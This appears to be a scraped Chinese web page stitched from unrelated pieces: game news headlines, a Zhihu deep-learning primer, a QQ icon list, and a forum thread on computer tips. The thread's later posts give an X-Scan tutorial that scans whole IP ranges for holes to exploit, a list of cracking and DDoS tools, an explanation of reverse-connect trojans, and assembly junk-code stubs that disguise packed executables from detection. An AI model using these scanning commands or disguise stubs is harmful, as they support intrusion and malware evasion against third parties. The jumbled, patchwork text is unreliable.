再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
威锋网7月10日消锋网7月10日消息,《植物大战僵尸2》 如今...
威锋网7月10日消息,《植物大...
近日,开发商 Esquilax Games ..
说到方块游戏,相信有很多朋友应该还会记得 Gavina Games 早...
威锋网7月10日消息,《植物大...
近日,开发商 Esquilax Games ..
说到方块游戏,相信有很多朋友应该还会记得 Gavina Games 早...
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
再吸金!SE推出《最终幻想:全员勇者》钥匙扣
您需要通过验证再能继续浏览 3秒后开始验证
威锋旗下产品
Hi~我是威威!
粤公网安备 11号
新三板上市公司威锋科技(836555)
增值电信业务经营许可证:
Powered by Discuz!深度学习如何入门? - 知乎31662被浏览1764389分享邀请回答/s/1nv54p9R 密码:3mty要说先准备什么,私以为,其实只需要知道导数和相关的函数概念就可以了。高等数学也没学过?很好,我就是想让文科生也能看懂,您只需要学过初中数学就可以了。其实不必有畏难的情绪,个人很推崇李书福的精神,在一次电视采访中,李书福说:谁说中国人不能造汽车?造汽车有啥难的,不就是四个轮子加两排沙发嘛。当然,他这个结论有失偏颇,不过精神可嘉。导数是什么,无非就是变化率呗,王小二今年卖了100头猪,去年卖了90头,前年卖了80头。。。变化率或者增长率是什么?每年增长10头猪,多简单。这里需要注意有个时间变量---年。王小二卖猪的增长率是10头/年,也就是说,导数是10.
函数y=f(x)=10x+30,这里我们假设王小二第一年卖了30头,以后每年增长10头,x代表时间(年),y代表猪的头数。
当然,这是增长率固定的情形,现实生活中,很多时候,变化量也不是固定的,也就是说增长率也不是恒定的。比如,函数可能是这样: y=f(x)=5x?+30,这里x和y依然代表的是时间和头数,不过增长率变了,怎么算这个增长率,我们回头再讲。或者你干脆记住几个求导的公式也可以。深度学习还有一个重要的数学概念:偏导数,偏导数的偏怎么理解?偏头疼的偏,还是我不让你导,你偏要导?都不是,我们还以王小二卖猪为例,刚才我们讲到,x变量是时间(年),可是卖出去的猪,不光跟时间有关啊,随着业务的增长,王小二不仅扩大了养猪场,还雇了很多员工一起养猪。所以方程式又变了:y=f(x)=5x??+8x? + 35x? +30
这里x?代表面积,x?代表员工数,当然x?还是时间。
上面我们讲了,导数其实就是变化率,那么偏导数是什么?偏导数无非就是多个变量的时候,针对某个变量的变化率呗。在上面的公式里,如果针对x?求偏导数,也就是说,员工对于猪的增长率贡献有多大,或者说,随着(每个)员工的增长,猪增加了多少,这里等于35---每增加一个员工,就多卖出去35头猪. 计算偏导数的时候,其他变量都可以看成常量,这点很重要,常量的变化率为0,所以导数为0,所以就剩对35x? 求导数,等于35. 对于x?求偏导,也是类似的。
求偏导我们用一个符号 表示:比如 y/ x? 就表示y对 x?求偏导。废话半天,这些跟深度学习到底有啥关系?有关系,我们知道,深度学习是采用神经网络,用于解决线性不可分的问题。关于这一点,我们回头再讨论,大家也可以网上搜一下相关的文章。我这里主要讲讲数学与深度学习的关系。先给大家看几张图: 图1. 所谓深度学习,就是具有很多个隐层的神经网络。图2.单输出的时候,怎么求偏导数图3.多输出的时候,怎么求偏导数。后面两张图是日语的,这是日本人写的关于深度学习的书。感觉写的不错,把图盗来用一下。所谓入力层,出力层,中间层,分别对应于中文的:输入层,输出层,和隐层。大家不要被这几张图吓着,其实很简单的。干脆再举一个例子,就以撩妹为例。男女恋爱我们大致可以分为三个阶段:
1.初恋期。相当于深度学习的输入层。别人吸引你,肯定是有很多因素,比如:身高,身材,脸蛋,学历,性格等等,这些都是输入层的参数,对每个人来说权重可能都不一样。
2.热恋期。我们就让它对应于隐层吧。这个期间,双方各种磨合,柴米油盐酱醋茶。
3.稳定期。对应于输出层,是否合适,就看磨合得咋样了。大家都知道,磨合很重要,怎么磨合呢?就是不断学习训练和修正的过程嘛!比如女朋友喜欢草莓蛋糕,你买了蓝莓的,她的反馈是negative,你下次就别买了蓝莓,改草莓了。
------------------------------------------------------------------------------------------------
看完这个,有些小伙可能要开始对自己女友调参了。有点不放心,所以补充一下。
撩妹和深度学习一样,既要防止欠拟合,也要防止过拟合。所谓欠拟合,对深度学习而言,就是训练得不够,数据不足,就好比,你撩妹经验不足,需要多学着点,送花当然是最基本的了,还需要提高其他方面,比如,提高自身说话的幽默感等,因为本文重点并不是撩妹,所以就不展开讲了。这里需要提一点,欠拟合固然不好,但过拟合就更不合适了。过拟合跟欠拟合相反,一方面,如果过拟合,她会觉得你有陈冠希老师的潜质,更重要的是,每个人情况不一样,就像深度学习一样,训练集效果很好,但测试集不行!就撩妹而言,她会觉得你受前任(训练集)影响很大,这是大忌!如果给她这个映象,你以后有的烦了,切记切记!
------------------------------------------------------------------------------------------------深度学习也是一个不断磨合的过程,刚开始定义一个标准参数(这些是经验值。就好比情人节和生日必须送花一样),然后不断地修正,得出图1每个节点间的权重。为什么要这样磨合?试想一下,我们假设深度学习是一个小孩,我们怎么教他看图识字?肯定得先把图片给他看,并且告诉他正确的答案,需要很多图片,不断地教他,训练他,这个训练的过程,其实就类似于求解神经网络权重的过程。以后测试的时候,你只要给他图片,他就知道图里面有什么了。所以训练集,其实就是给小孩看的,带有正确答案的图片,对于深度学习而言,训练集就是用来求解神经网络的权重的,最后形成模型;而测试集,就是用来验证模型的准确度的。对于已经训练好的模型,如下图所示,权重(w1,w2...)都已知。
图5我们知道,像上面这样,从左至右容易算出来。但反过来呢,我们上面讲到,测试集有图片,也有预期的正确答案,要反过来求w1,w2......,怎么办?绕了半天,终于该求偏导出场了。目前的情况是:1.我们假定一个神经网络已经定义好,比如有多少层,都什么类型,每层有多少个节点,激活函数(后面讲)用什么等。这个没办法,刚开始得有一个初始设置(大部分框架都需要define-and-run,也有部分是define-by-run)。你喜欢一个美女,她也不是刚从娘胎里出来的,也是带有各种默认设置的。至于怎么调教,那就得求偏导。2.我们已知正确答案,比如图2和3里的r,训练的时候,是从左至右计算,得出的结果为y,r与y一般来说是不一样的。那么他们之间的差距,就是图2和3里的E。这个差距怎么算?当然,直接相减是一个办法,尤其是对于只有一个输出的情况,比如图2; 但很多时候,其实像图3里的那样,那么这个差距,一般可以这样算,当然,还可以有其他的评估办法,只是函数不同而已,作用是类似的:不得不说,理想跟现实还是有差距的,我们当然是希望差距越小越好,怎么才能让差距越来越小呢?得调整参数呗,因为输入(图像)确定的情况下,只有调整参数才能改变输出的值。怎么调整,怎么磨合?刚才我们讲到,每个参数都有一个默认值,我们就对每个参数加上一定的数值?,然后看看结果如何?如果参数调大,差距也变大,你懂的,那就得减小?,因为我们的目标是要让差距变小;反之亦然。所以为了把参数调整到最佳,我们需要了解误差对每个参数的变化率,这不就是求误差对于该参数的偏导数嘛。关键是怎么求偏导。图2和图3分别给了推导的方法,其实很简单,从右至左挨个求偏导就可以。相邻层的求偏导其实很简单,因为是线性的,所以偏导数其实就是参数本身嘛,就跟求解x?的偏导类似。然后把各个偏导相乘就可以了。这里有两个点:这里有两个点:一个是激活函数,这主要是为了让整个网络具有非线性特征,因为我们前面也提到了,很多情况下,线性函数没办法对输入进行适当的分类(很多情况下识别主要是做分类),那么就要让网络学出来一个非线性函数,这里就需要激活函数,因为它本身就是非线性的,所以让整个网络也具有非线性特征。另外,激活函数也让每个节点的输出值在一个可控的范围内,这样计算也方便。貌似这样解释还是很不通俗,其实还可以用撩妹来打比方;女生都不喜欢白开水一样的日子,因为这是线性的,生活中当然需要一些浪漫情怀了,这个激活函数嘛,我感觉类似于生活中的小浪漫,小惊喜,是不是?相处的每个阶段,需要时不时激活一下,制造点小浪漫,小惊喜,比如;一般女生见了可爱的小杯子,瓷器之类都迈不开步子,那就在她生日的时候送一个特别样式,要让她感动得想哭。前面讲到男人要幽默,这是为了让她笑;适当的时候还要让她激动得哭。一哭一笑,多整几个回合,她就离不开你了。因为你的非线性特征太强了。当然,过犹不及,小惊喜也不是越多越好,但完全没有就成白开水了。就好比每个layer都可以加激活函数,当然,不见得每层都要加激活函数,但完全没有,那是不行的。由于激活函数的存在,所以在求偏导的时候,也要把它算进去,激活函数,一般用sigmoid,也可以用Relu等。激活函数的求导其实也非常简单:求导: f'(x)=f(x)*[1-f(x)]
这个方面,有时间可以翻看一下高数,没时间,直接记住就行了。
至于Relu,那就更简单了,就是f(x) 当x&0的时候y等于0,其他时候,y等于x。
当然,你也可以定义你自己的Relu函数,比如x大于等于0的时候,y等于0.01x,也可以。另一个是学习系数,为什么叫学习系数?刚才我们上面讲到?增量,到底每次增加多少合适?是不是等同于偏导数(变化率)?经验告诉我们,需要乘以一个百分比,这个就是学习系数,而且,随着训练的深入,这个系数是可以变的。当然,还有一些很重要的基本知识,比如SGD(随机梯度下降),mini batch 和 epoch(用于训练集的选择),限于篇幅,以后再侃吧。其实参考李宏毅的那篇文章就可以了。这篇拙文,算是对我另一个回答的补充吧:
其实上面描述的,主要是关于怎么调整参数,属于初级阶段。上面其实也提到,在调参之前,都有默认的网络模型和参数,如何定义最初始的模型和参数?就需要进一步深入了解。
不过对于一般做工程而言,只需要在默认的网络上调参就可以了,相当于用算法;
对于学者和科学家而言,他们会发明算法,难度还是不小的。向他们致敬!写得很辛苦,觉得好就给我点个赞吧:)------------------------------------------------------------------------------------------------关于求偏导的推导过程,我尽快抽时间,把数学公式用通俗易懂的语言详细描述一下,前一段时间比较忙,抱歉:)------------------------------------------------------------------------------------------------8.1K216 条评论分享收藏感谢收起52744 条评论分享收藏感谢收起查看更多回答QQ新闻资讯
腾讯系列软件
腾讯手机业务
QQ空间和校友的应用以及网页游戏
QQ技巧,QQ教程
QQ表情,QQ头像,QQ空间素材
QQ空间日志,聊天宝典
测试,生肖,星座,搞笑
您的位置: ->
发布日期: 23:27:20 经常有Q友问:如何点亮QQ图标呀、QQ图标怎么隐藏、QQ2012图标点亮大全有哪些、如何点亮和熄灭全部QQ图标呀,QQ图标怎么全部熄灭。懒得一个一个答复了,在最新的里没有新增图标。目前,QQ图标总数达到了破记录的<font color="#FF个。大家来看:
钻石类业务(12个)
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
不交钱,次月自动关闭
可用QQ图标管理器隐藏
可用QQ图标管理器隐藏
手机类业务(8个)
不交钱,次月自动关闭
QQ短信超人
不交钱,次月自动关闭
可用QQ图标管理器隐藏
游戏类业务(46个)
可用QQ图标管理器隐藏
不交钱,次月自动关闭
可用QQ图标管理器隐藏
可用QQ图标管理器隐藏
超过30天不登录
暂时不能点亮
可用QQ图标管理器隐藏
QQ相关类业务(8个)
不交钱,次月自动关闭
已安装视频设备
关闭视频设备
QQ安全达人
可用QQ图标管理器隐藏
可用QQ图标管理器隐藏
可用QQ图标管理器隐藏
QQ等级达人
可用QQ图标管理器隐藏
QQ空间相关业务(5个)
连续15天未登陆
可用QQ图标管理器隐藏
搜搜旗下业务(4个)
30天内未登录过搜搜
电子商务业务(9个)
在拍拍网通过卖家认证
超过30天不消费
超过30天不消费
可用QQ图标管理器隐藏
财付通会员
可用QQ图标管理器隐藏
可用QQ图标管理器隐藏
QQ网购充值中心
可用QQ图标管理器隐藏
腾讯软件类业务(7个)
(原QQLive)
QQ输入法()
连续14天没有使用
三天不用自动熄灭
连续15天未登陆
其他服务类业务(5个)
腾讯图书VIP
不交钱,次月自动关闭
收藏数低于10条
不交钱,次月自动关闭
好莱坞会员
不交钱,次月自动关闭
其他社区类业务(5个)
暂时不可熄灭
注:现在很多图标分等级了,以上展示的只是一级的图标,具体的图标样式请进入“怎么点亮”的文章查看。
注1:QQ幻想是不是免费的游戏:前10级是免费的,三级就可以点亮,所以说点亮QQ幻想图表是免费的。请看。
现在除了“图标族”还有“白板族”,就是把所有的QQ图标都去掉,用这个,快捷方便。实在不行的话,可以打腾讯官方服务热线6,就说QQ被盗了,给人开了业务,要求关闭,运气好的话可以人工关闭。
旧的一些图标,新版已经去掉:
:在最新的QQ2012 beta2里,QQ爱墙图标已经被删除。
:在最新的QQ2010正式版SP2里,Q吧用户图标已经被删除。
:在最新的QQ2010正式版SP1里,QQ滔滔图标已经被删除,将要被代替。
:已经下线,在QQ2010正式版已经消失。
:在QQ2010正式版已经消失。
:拍拍充值贵族图标在QQ2010 Beta3里已经被彩钻图标代替。
:QQ交友图标在QQ2010里已被城市达人图标取代。
:出来几年一直无法点亮,在QQ2009正式版SP2里已消失。
:。已停止运营,QQ2009正式版里仍有这个图标,在QQ2009正式版SP1里已消失。
:Q歌Q魅停止运营,图标已全部熄灭。
QQTalk团队语音:(暂停)。
QQ电话:打开QQ个人设置里的联系方式,在下方有个QQ电话,有手机可免费开通。
小秘书:登陆QQ,然后在个人资料里的右下方点“设置小秘书”,接着点开通就有显示了。
QQ音乐:已经被QQ音乐绿钻贵族取代。
TM用户:用TM登陆就有显示了。帖子主题:电脑软硬件知识楼
共&47923&个阅读者&
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
电脑软硬件知识楼
文章提交者:秘书
加贴在&&铁血论坛
http://bbs.tiexue.net/bbs76-0-1.html
习常见问题1.修复IE通过在开始-运行中输入下面的命令进行修复IE打不开二级链接" actxprxy.dll"(输入时不包括引号的)还有regsvr32 shdocvw.dll黄山IE修复点我下载,使用软件一定要看帮助和说明2.IE 6.0的重装有两种方法:
方法1:打开“注册表编辑器”,找到[HKEY_LOCAL_ \\Microsoft\ \Installed Components\{-ECBD-11cf-8B85-00AA005B4383}],将IsInstalled的DWORD值改为0就可以了.方法2:放入 安装盘,在“开始→运行”窗口键入“rundll32.exe运行"rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf"上面命令,然后提示插入XP系统盘.然后点击浏览,找到光驱里的文件夹,然后点打开,最后点确定.(重装IE
延伸阅读:
本帖已赚工分: 1021本帖已赚金币: 0
【红色尖兵特战大队职务】: 副参谋长
【红色尖兵特战大队军衔】:大校
【红色尖兵特战大队军籍号】:HJT-0-005
本帖已经被管理员锁定,不能回复
电脑软硬件知识楼相关文章
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174 军号:1058295 工分:5586
左箭头-小图标
恭喜自己500层封顶
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
这里使用x-scanner作为介绍对象,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP地址段(或独立IP地址)进行安全漏洞扫描,提供了图形界面和命令行两种操作方式,扫描内容包括:标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令,NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程序及解决方案,节省了查找漏洞介绍的时间。首先x-scanner包括了两个运行程序:xscann.exe和xscan_gui.exe,这两个程序分别是扫描器的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner可以支持对多个IP地址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP地址,例如在IP地址范围内输入211.100.8.1-211.100.8.255就会扫描整个C类的255台服务器(如果存在的话),这样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址,扫描程序将针对单独IP进行扫描。剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取80或者8080,对于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个socket连接,在同一时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。在图形界面下我们看到了程序连接地址“.\xscan.exe”,这实际上就是xscanner的控制台程序,也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是真正黑客喜爱的操作方式。现在我们进行一个简单的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan 211.100.8.87 -port这个命令的意思是让xscanner扫描服务器211.100.8.87的开放端口,扫描器不会对65535个端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下:Initialize dynamic library succeed.Scanning 211.100.8.87 ......[211.100.8.87]: Scaning port state ...[211.100.8.87]: Port 21 is listening!!![211.100.8.87]: Port 25 is listening!!![211.100.8.87]: Port 53 is listening!!![211.100.8.87]: Port 79 is listening!!![211.100.8.87]: Port 80 is listening!!![211.100.8.87]: Port 110 is listening!!![211.100.8.87]: Port 3389 is listening!!![211.100.8.87]: Port scan completed, found 7.[211.100.8.87]: All done.这个结果还会同时在log目录下生成一个html文档,阅读文档可以了解发放的端口对应的服务项目。从结果中看到,这台服务器公开放了七个端口,主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件,如此一来,我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞,之后进行进一步进攻。漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台服务器上所有开放了80端口的服务器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan 61.135.50.1-61.135.50.255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文档比较方便。二、扫描器使用问题:载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。1、为什么我找不到扫描器报告的漏洞?扫描器报告服务器上存在某个存在漏洞的文件,是发送一个GET请求并接收服务器返回值来判断文件是否存在,这个返回值在HTTP的协议中有详细的说明,一般情况下“200”是文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息2000年x月x日中的200是“文件存在”标志,这样就会造成误报;另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果GET申请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在,都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于服务器上。这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文件是否存在,但这种方法对使用者的能力要求较高。2、我使用的扫描器速度和网络速度有关系嘛?关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造成本地系统瘫痪,一般使用30个线程左右比较合适。另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一IP的单位时间GET申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描速度之前,应该先确认服务器没有相应的过滤功能之后再使用。3、扫描器报告给我的漏洞无法利用是什么原因?确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网站的“安全公告”获得相应知识。对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依靠他人,而是自己寻找漏洞进行攻击的。4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因?有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描,这样当然是什么也找不到啦。如果问题真的如此,可以将等待时间设置的长一些,或者换个ISP拨号连接。5、扫描器报告服务器没有提供HTTP服务?网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80,而有少量的HTTP服务器并不是使用80端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务,网络上常见的端口还有8080和81。另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描器的功能不仅仅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不是出在自己身上。6、扫描器使用过程中突然停止响应是为什么?扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。7、下载回来的扫描器里面怎么没有可执行文件?扫描器不一定非要是可执行的exe文件,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络上的其它系统中,不需要使用者上网就能够24小时不停的进行大面积地址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是tar为扩展名,那么这个扫描器是运行在Linux系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格式也和FAT32不一样。8、扫描器只报告漏洞名称,不报告具体文件怎么办?只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找,并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
横于黑客江湖,没几件称心兵器怎能立足?No.1 懂得用刀杀人并不困难,要懂得如何用刀救人,却是件困难的事。兵器名称:X-Scan杀伤指数:★★★★☆独门绝技:采用了多线程方式对指定IP地址段进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式。扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类,支持在线升级,是国内最优秀的安全扫描软件之一。通常为黑客攻击前寻找肉鸡,检测漏洞之用。No.2 一个人一生中一定要勉强自己做几件不愿做的事,这样的生命才有意义。兵器名称:流光杀伤指数:★★★★☆独门绝技:可以探测POP3、FTP、HTTP、PROXY、FORM、SQL、SMTP、IPC$上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码,进而掌控guest和管理员权限。不论是新手还是资深黑客都对它青睐有加。每天有大量受害者欲哭无泪。No.3 世上若还有比遇见一个泼妇更头痛的事,那就是遇见了一群泼妇。兵器名称:DDoS系列杀伤指数:★★★★★独门绝技:分布式拒绝服务攻击,比较难以防范的攻击手段。攻击者借助一定数量的傀儡机,提出过量合理的服务请求来占用攻击对象系统和网络资源,造成目标瘫痪和崩溃。黑客的神兵利器数不胜数,好把式的黑客还可以随手打造专用工具。心有多大,舞台就有多大。难道这些就算是黑客最厉害的武器吗?当然不是,黑客最厉害的武器,是他们的微笑。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
特洛伊木马这样一种黑客技术,一出现,就引起了人们的关注。除了从不同的角度防范木马行为的发生,在防火墙技术上的发展,也有效地遏止了木马的泛滥。但是有些用户还是发现,即使将自己的防火墙设置为禁止外来主动连接,防范了理论上的木马,也无法排除信息泄露的可能。网络利用率常常居高不下,不正常的连接还是会频繁出现。那么,我们现在就不得不关注木马技术的新发展――反弹式木马。一、什么是反弹式木马我们都知道,所谓的“特洛伊木马”,就是一种基于“客户机/服务器”模式的远程控制程序,它让用户的机器运行服务器端的程序,这个服务器端的程序会在用户的计算机上打开监听的端口。这就给黑客入侵用户计算机打开了一扇进出的门,然后黑客就可以利用木马的客户端入侵用户的计算机系统。随着防火墙技术的提高和发展,基于IP包过滤规则来拦截木马程序可以很有效地防止外部连接,因此黑客在无法取得连接的情况下,也无所作为。然而,“道高一尺,魔高一丈”这个安全领域里的“规律”无时不在起作用。聪明的木马程序员又发明了所谓的“反弹式木马”――它利用防火墙对内部发起的连接请求无条件信任的特点,假冒是系统的合法网络请求来取得对外的端口,再通过某些方式连接到木马的客户端,从而窃取用户计算机的资料同时遥控计算机本身。二、反弹式木马的原理常见的普通木马,是驻留在用户计算机里的一段服务程序,而攻击者控制的则是相应的客户端程序。服务程序通过特定的端口,打开用户计算机的连接资源。一旦攻击者所掌握的客户端程序发出请求,木马便和他连接起来,将用户的信息窃取出去。可见,此类木马的最大弱点,在于攻击者必须和用户主机建立连接,木马才能起作用。所以在对外部连接审查严格的防火墙下,这样的木马很难工作起来。而反弹式木马,在工作原理上就于常见的木马不一样。由于反弹式木马使用的是系统信任的端口,系统会认为木马是普通应用程序,而不对其连接进行检查。防火墙在处理内部发出的连接时,也就信任了反弹木马。“网络神偷”是目前最常见的一种反弹式木马,它的工作原理也就是这样的。这充分说明了另一条至理名言:堡垒总是从内部被突破的。三、如何防范反弹式木马那么,如何防范这类反弹式木马呢?1、我们推荐大家使用个人防火墙,如《天网个人防火墙》或者《金山网镖个人防火墙》,这两款防火墙在防范反弹式木马上有优秀的表现:它们采用独特的“内墙”方式――应用程序访问网络规则,专门对付存在于用户计算机内部的各种不法程序对网络的应用。从而可以有效的防御像“反弹式木马”那样的骗取系统合法认证的非法程序。当用户计算机内部的应用程序访问网络的时候,必须经过防火墙的内墙的审核。合法的应用程序被审核通过;而非法的应用程序将会被天网防火墙个人版的“内墙”所拦截。2、再就是老生常谈了,千万不要随便运行陌生的程序;收到邮件一定要先查看附件,再运行;不要隐藏文件后缀,发现是“.EXE”一定要小心。这些都是对付木马程序应该注意的地方,在此就不赘述了。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
12.伪装花花添加器(痴情大圣)代码:nop..........省略N行nopnoppush ebpmov ebp, espadd esp, -0Cadd esp, 0Cmov eax, 原入口地址push eaxretn************************************************************************13.伪装花花添加器(如果*爱)代码:nop........省略N行nopnoppush ebpmov ebp, espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxmov eax, 原入口地址jmp eax************************************************************************14.伪装PEtite 2.2 -& Ian Luck代码:mov eax,push push dword ptr fs:[0]mov dword ptr fs:[0],esppushfwpushadpush eaxxor ebx,ebxpop eaxpopadpopfwpop dword ptr fs:[0]pop eaxjmp 原入口地址 '执行到程序的原有OEP************************************************************************15.无效PE文件代码:push ebpmov ebp,espinc ecxpush edxnoppop edxdec ecxpop ebpinc ecxMOV DWORD PTR FS:[0],EAX \POP EAX |POP EAX \MOV DWORD PTR FS:[0],EAX |(注意了。。花指令)POP EAX /POP EAX |MOV DWORD PTR FS:[0],EAX /loop 